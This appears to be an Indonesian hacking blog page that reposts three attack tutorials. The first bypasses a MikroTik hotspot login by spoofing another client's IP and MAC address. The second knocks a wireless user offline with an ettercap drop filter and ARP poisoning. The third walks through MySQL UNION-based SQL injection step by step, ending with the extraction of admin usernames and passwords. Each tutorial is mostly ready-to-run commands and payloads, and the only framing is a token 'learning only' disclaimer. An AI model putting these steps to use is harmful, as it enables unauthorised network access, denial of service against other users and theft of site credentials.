Melewati Akses Mikrotik (Bypass Mikrotik)

Cara ini memang sudah basi di network hacking, tapi gak apa2 niatnya kan cuman share. cz Ilmu itu milik Dunia hahahaha
ok langsung saja saya menggunakan LInux, windows juga bisa
1. Koneksikan Hotspot seperti biasa

root@eXpL01t3r:~#ifconfig wlan0 up

root@eXpL01t3r:~# iwconfig wlan0 essid “HOTSPOTKU”

root@eXpL01t3r:~#iwconfig wlan0 ap 00:11:22:33:44:55

2. cari client(komputer) yang terkoneksi dengan bantuan tuxcut atau wireshark, pilih salah satunya yang sedang terkoneksi. dan catat Ip dan Macadressnya

3. sekarang ganti ip dan macadress kamu dengan ip yang kamu catat tadi
Misalkan Ip dan Maccadres yang kamu catat :
ip : 192.168.30.13
macc :00:17:c4:bd:fe:09
gateway/mikrotik :192.168.30.1

root@eXpL01t3r:~#ifconfig wlan0 down

root@eXpL01t3r:~#macchanger -m 00:17:c4:bd:fe:09 wlan0

root@eXpL01t3r:~#ifconfig wlan0 up

root@eXpL01t3r:~#ifconfig wlan0 192.168.30.13

root@eXpL01t3r:~#route add default gw 192.168.30.1

4. setelah macc dan ip sudah terganti, koneksikan kembali seperti biasa –> ke no.1
Intinya disini cuman mengganti Ip dan Maccadres client yang telah melewati akses mikrotik

Cara ke 2
Untuk cara ke 2 dengan melakukan ssh tunneling, jadi seperti ini, biasanya user & password Mikrotik tiap komputer berbeda-beda, biasanya terjadi di jaringan kampus. anggaplah anda sebagai tamu di kampus, dan duduk di kantin dan ingin berinternet , jika anda meminta user dan pass mikrotik keteman anda, tetapi teman anda juga sedang memakai user dan password mikrotiknya. maka anda tidak dapat melewati akses mikrotiknya.
jadi biasanya saya melakukan cara ssh tunneling ke komputer teman saya
1. Suruh teman anda untuk membuka port 22 SSH nya
2. sekarang tunneling ke komputer teman
contoh : ip teman kamu : 192.168.30.7

root@eXpL01t3r:~#ssh -D 1080 user@192.168.30.7

nah minta password, isikan password teman kamu
3. sekarang tinggal setting di browser, masuk di pengaturan proxy di browser:
Preference > Network > Setting > Manual Proxy Configuration
isikan SOCKS Host : localhost
Port : 1080
4. Silahkan Berinternet ria
Intinya disini sharing internet via ssh tunneling

Maaf kalaw ada kesalahan diperbaiki cz lupa2 ingat hehehehehe. n klw ada yang kurang jelas silahkan komentnya
Thank’s semoga berguna

Referensi th3w1tch.wordpress.com

Dos jaringan WIRELESS on ettercap

sy pengen curhat nih tentang pengamalan sy seminggu yg lalu,tepatx di warkop hostpot.
[maklum nga mampu pasang internet makanya main2 di warkop doank
gini nih historynya : setelah beberapa menit ada org jahat pengen nyoba2 kerjain sy…rencana c…. tu org pengen nyadap USER ma PASS sy. mulanya diya putusin jaringan sy dengan software andalannya NETCUT (win) TUXCUT (linux pake .deb).awalnya jaringan sy putus2 tp kok org disamping sy fine2 aja…ahh ternyata ada org mo kerjain sy ….
sy pengen liat ip yg mana serang sy dengan IPTRAF or wireshark 0R tcpdump …yg ada si di slackware sy…
ternyata yg serang sy dengn ip ini nih 192.168.1.234 aq serang balik the…

to the p01nt aja..

1) kita harus mempunyai ettercap
2) masuk pada directory tux buat file text di dalamnya

root *-* vim-n4n0:~$ su

password:

root *-* vim-n4n0:~#cd /usr/local/share/ettercap/

root *-* vim-n4n0:/usr/local/share/ettercap# kwrite

setelah muncul text editor copy script ini :

if (ip.src == ‘192.168.1.11’ || ip.dst == ‘192.168.1.234’) {
drop();
kill();
msg(“matiko Dropped\n”);
}

kemudian save lalu simpan dengan nama dos.eft
Nb: buat 2 file text pada directory diatas dengan nama dos.eft & dos.ef

3) load file tersebut : carany >>>>

root *-* vim-n4n0:/usr/local/share/ettercap#etterfilter dos.eft -o dos.ef

4) lakukan penyerangan pada target :

root *-* vim-n4n0:~# ettercap -i wlan0 -T -q -F /usr/local/share/ettercap/dos.eft -M ARP /192.168.1.234/ //

5) setelah i2 ettercap meload file text yg kita buat
6) apabila ada tertulis [paket Drop] maka target udah lumpuh gitu loh..
7) ini hanya pembelajaran semata jangan di salah gunakan ya…..

Referensi http://xmalakaji.wordpress.com
GOoD LucK …

My SQL Injection Step by Step

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau –
comments: /* atau —
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100’ atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):

==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh:

[site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)…
misal:

[site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–

===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–

seumpama table yang muncul adalah “admin”

===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_schema=database()–

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa– >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema ​.columns+where+table_name=0xhexa–

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.dolcevie.com/js/converter.html

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E–

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin–

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .

Silahkan DI pelajari Kaka 1 .

======================================